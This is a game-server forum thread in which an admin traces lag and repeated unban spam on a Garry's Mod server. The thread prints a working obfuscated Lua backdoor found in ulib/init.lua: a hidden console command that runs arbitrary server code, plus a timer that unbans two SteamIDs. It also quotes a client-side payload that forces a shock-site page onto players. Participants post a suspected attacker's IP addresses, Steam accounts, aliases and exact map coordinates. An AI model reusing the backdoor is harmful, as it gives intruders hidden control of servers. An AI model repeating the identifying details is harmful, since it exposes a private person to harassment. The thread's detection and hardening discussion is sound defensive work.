My main server has been having a very bad connection with 900+ ping. If I start the server on another IP address or port number, it runs fine. When looking at Netlimiter, the server has an unusual number of outgoing and incoming connections compared to my other servers, despite being empty. None of my other servers have this issue. It seems like this may be some kind of malformed packet attack, but I really have no idea. I was wondering if anybody had any suggestions.
Wireshark save:
[URL]http://216.245.193.98/xmisc/attackissue.pcap[/URL]
Note: The server having the issue is 216.245.193.98:27015
Here is a Wireshark txt output:
[URL]http://216.245.193.98/xmisc/oddissue2[/URL]
In particular there are a lot of packets coming from 96.43.138.109, but I really do not know if that is the cause. They are going to 216.245.193.98:27015 however, which is the address of my server.
It's definitely some sort of issue with the port, like an attack. If I host my server on another IP it works fine. If I host another server at this IP, it has the same issue.
Not sure if this is a coincidence or not, but here's what happened. I used IPSec to block the IP address, 96.43.138.109 and the lag stopped instantly. Afterwards, I have an odd issue where the server crashes and restarts at exact intervals of about 30 seconds. The server console is also getting spammed with "removeid" commands of two SteamIDs that are known exploiters that have somehow uploaded Lua files to the server before.
After a while, the crashing stopped and the server ran stable for a while. Soon the huge lag begins again. I do a Wireshark capture and an abnormal number of packets is coming from 96.43.138.124 (notice how close it is to the other IP). I block that IP and the lag instantly stopped. The removeids are still being spammed. I have already confirmed that rcon is secure, and I'm working on doing batch searches for any uploaded Lua that is spamming the unban.
[editline]19th May 2011[/editline]
I found this in addons/ulib/init.lua at the very bottom:
[lua]-- Names are built from string fragments so a plain "find in files" for RunString, concommand or the SteamIDs finds nothing
local r = _G["R".."u".."n".."Str".."ing"]   -- RunString
local c = _G["co".."nco".."mman".."d"]      -- concommand
local a = "A".."dd" local s = "i".."i"       -- "Add", "ii"
c[a](s, function(m, n, o) r(o[1]) end)      -- concommand.Add("ii", ...): runs its first argument as server-side Lua
local s1 = "STE".."AM_0:".."1:1767".."2340" local s2 = "STEA".."M_0:".."1:548".."998".."8"   -- STEAM_0:1:17672340, STEAM_0:1:5489988
local ub = "un".."b".."an"                   -- "unban"
-- Every 5 seconds, forever: unban both IDs through ULib (the "removeid" spam seen in the console)
timer.Create("Spy sappin mah code", 5, 0, function() if (ULib && ULib[ub]) then ULib[ub](s1) ULib[ub](s2) end end)[/lua]
I don't know how they're uploading. I'm really lucky my batch search just happened to be the first 4 digits of their Steamid, seeing as to how they've obfuscated it.
lol, obfuscation, that guy needs to work on it, it's pretty obvious when you look at it
[QUOTE=CmdrMatthew;29935505]lol, obfuscation, that guy needs to work on it, it's pretty obvious when you look at it[/QUOTE]
It's not obfuscation, it's probably so you can't just use find in files on RunString/concommand/SteamIDs.
Considering there is an exploit out there where you can upload lua, I'd say that this is a real issue. I've had to delete random RunString functions and stuff several times now.
Other ways of obfuscation I've seen include String.char, and of course using the _G table is useful.
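The splitting discussed above (function names and SteamIDs built from concatenated fragments, or from string.char) defeats a plain find-in-files, but the fragments are still constant strings and can be folded back together before searching. An added example, not from the thread or from ULib: a small Python scanner that folds `..` concatenations of string literals and `string.char(...)` calls, then searches the folded line for RunString, concommand, SteamIDs and similar names; it runs on a constructed snippet modelled on the one found in ulib/init.lua.

```python
import re

# Constructed sample modelled on the snippet in the thread (not the real addon file)
SAMPLE = '''
local r = _G["R".."u".."n".."Str".."ing"]
local c = _G["co".."nco".."mman".."d"]
local s1 = "STE".."AM_0:".."1:1767".."2340"
local ok = string.char(82,117,110,83,116,114,105,110,103)
local harmless = "hello" .. name
'''

# One Lua string literal (double or single quoted, with backslash escapes)
STR = r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\''
# Two or more literals joined by ".." on the same line (no newline crossing, so line numbers survive)
CONCAT = re.compile(rf'(?:{STR})(?:[ \t]*\.\.[ \t]*(?:{STR}))+')
CHARS = re.compile(r'string\.char[ \t]*\(([\d ,]+)\)')
# Names worth a look once the strings are folded; the SteamID pattern matches the unban targets
SUSPICIOUS = re.compile(r'RunString|CompileString|concommand|STEAM_0:\d:\d+|http\.Fetch', re.I)

def fold_concats(src):
    """Replace "a".."b".."c" with "abc" wherever every operand is a literal."""
    def join(m):
        parts = re.findall(STR, m.group(0))
        return '"' + ''.join(a or b for a, b in parts) + '"'
    return CONCAT.sub(join, src)

def fold_chars(src):
    """Replace string.char(82,117,...) with the decoded literal."""
    def join(m):
        nums = [int(n) for n in m.group(1).replace(' ', '').split(',') if n]
        return '"' + ''.join(chr(n) for n in nums) + '"'
    return CHARS.sub(join, src)

def scan(src):
    """Return (line number, matched name, was_obfuscated) for every hit in the folded source."""
    folded = fold_chars(fold_concats(src))
    hits = []
    for lineno, (raw, cooked) in enumerate(zip(src.splitlines(), folded.splitlines()), 1):
        m = SUSPICIOUS.search(cooked)
        if m:
            # was_obfuscated is True when the name only appears after folding
            hits.append((lineno, m.group(0), SUSPICIOUS.search(raw) is None))
    return hits

if __name__ == "__main__":
    for lineno, name, hidden in scan(SAMPLE):
        print(f"line {lineno}: {name}{' (hidden by concatenation)' if hidden else ''}")
```

Run it over addons/, lua/autorun/ and gamemodes/ by reading each file into `scan`; a hit flagged as hidden is the one a normal text search would have missed.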
Do you have sv_allowupload 0?
Yes, I do
[code]sv_allowupload 0
sv_allowdownload 0[/code]
Rcon password has been changed several times as well, so that's not the issue either.
Do you have any binary modules installed that allow file reading/writing? Check the lua/includes/modules/ folder.
No, I actually made sure of this since the beginning. The only .dll module is gm_sqlite.
How big is it (kb)?
They have access to your FTP/Control Panel/RDP account.
gm_sqlite.dll is 464,384 bytes. I'm currently locking down my server by hardcoding bans against the attackers using gmsv_gatekeeper, however that obviously doesn't mitigate the fact that it is possible to upload Lua files to my server.
[editline]19th May 2011[/editline]
[QUOTE=FlapadarV2;29935751]They have access to your FTP/Control Panel/RDP account.[/QUOTE]
My FTP logs show many attempts, but no one has been using it other than me. I have no control panel. My Event Viewer logs show a ton of attempted logins, but the only logins are by me, and since I have school during a certain time period I'm sure it's me. So I am positive the remote desktop is compromised. Besides, in the unlikely event remote desktop was compromised, I'm sure they would do more damage than toy around with one out of many gameservers and websites.
So I don't see why you're so sure the server is compromised at that level, I'm not a complete newbie at managing a dedicated server.
If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script...
If they had FTP they could just remove their ID from the ban file...
:rolleyes:
[QUOTE=silverblu;29935973]If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script...
If they had FTP they could just remove their ID from the ban file...
:rolleyes:[/QUOTE]
They might be lazy. There's no way without a binary module that they could edit ULib's init file. The file upload exploit only worked for creating files, not updating them.
[QUOTE=infinitywrai;29935768]So I don't see why you're so sure the server is compromised at that level, I'm not a complete newbie at managing a dedicated server.[/QUOTE]
It's the only real logical solution.
I've been in an email conversation with the person before and they vaguely mention some "attack vector" but then they stopped responding to my emails after I offered money in return for it...
I see where you're coming from but unfortunately I don't see any evidence of those vectors being vulnerable.
Out of curiosity, who was it? Would you mind telling me the email/steamid/ip?
[QUOTE=silverblu;29936365]Out of curiosity, who was it? Would you mind telling me the email/steamid/ip?[/QUOTE]
I would assume STEAM_0:1:5489988 and STEAM_0:1:17672340.
If they got access to your FTP, you can only assume they are smart enough to purge the logs of their entry....
The logs are not stored anywhere except in RAM, it is not possible to clear them through FTP.
The attacker is likely somewhere in Philadelphia based on IP traces of several of their IPs. They change their name often and have 2-3 or more Steam accounts. That's about all I know. The email they contact me with is a throwaway they made so I won't bother sharing it.
I am a staff member on this server, another of us made a thread about this but failed to provide sufficient information. I have a good collection of his information here.
[url]http://www.facepunch.com/threads/1084549-Big-time-Garrysmod-server-hacker-!?p=29551223&highlight=#post29551223[/url]
It appears he changed the url on one of his steam accounts, and his primary one at that.
He goes by the name of "Broguydudemanperson."
Your "info" is far from exact.
But it is still info, and all of it that any of us have at that.
Can't blame me for trying.
Don't read Fantah's post. Read the one by me that is a bit further down.
Better yet, let me paste it all here.
[quote]
[url]http://whatismyipaddress.com/ip/98.235.1.178[/url]
[url]http://whatismyipaddress.com/ip/174.55.7.226[/url]
[url]http://whatismyipaddress.com/ip/174.60.64.156[/url]
An example of Lua code he was able to distribute to a client:
[code]SendLua: __page_ = "http://www.lemonparty.org/"
SendLua: if (__html_) then __html_:Remove() end __html_ = vgui.Create('HTML') __html_:SetPos(0, 0) __html_:SetSize(ScrW(), ScrH()) __html_:OpenURL(__page_)[/code]
Multiple steam accounts that he uses:
[url]http://steamcommunity.com/id/personguybroman/[/url]
[url]http://steamcommunity.com/id/dickfondler/[/url]
[url]http://steamcommunity.com/id/timek33per/[/url]
Additional information:
[url]http://pastebin.com/MBb3qC47[/url]
We have this guy completely identified, and yet we can do absolutely nothing about it. This is ridiculous.
[/quote]
Three IP addresses and 2 STEAM accounts far from exact? Don't know what you consider exact then.
Location: East Berlin, Pennsylvania.
Exact location: [url]http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=39.937597+-76.978589&sll=37.0625,-95.677068&sspn=43.307813,60.908203&ie=UTF8&t=h&z=16[/url]
Just saying, he could be anywhere within 300 miles of that. It's only exact when you don't rely on whois.
[editline].[/editline]
As in, you can phone up the kids' mum exact. Fun to do.
You're right, Flapadar, all we know is he resides somewhere in Pennsylvania based on the IP traces. They've all been in various cities within that state. I've stopped recording his IP addresses as of late because they switch every time.
Don't get the impression that we actually want to go after this individual specifically, seeing as to how that wouldn't fix that exploit.
It isn't the physical locations that matter.
Well, not entirely.
They are IP addresses after all and each one of them link to the same address.
I can confirm that this is him.
[QUOTE=Banjoquard;29936822]Three IP addresses and 2 STEAM accounts far from exact? Don't know what you consider exact then.[/QUOTE]
PM'd you with a short explanation. I still doubt this is an exploit, and if it is, it seems targeted at ULX.
I've already said why RDP and FTP aren't compromised, I'm leaning on the fact that it's an exploit of some sort. (Could be ULX targeted, but I don't see how that would allow them the ability to write to Lua files.) Keep in mind that in the past, the attacker has written to gamemodes, lua/autorun, and even lua/includes/glon.lua
-snip- forget that, definitely wrong.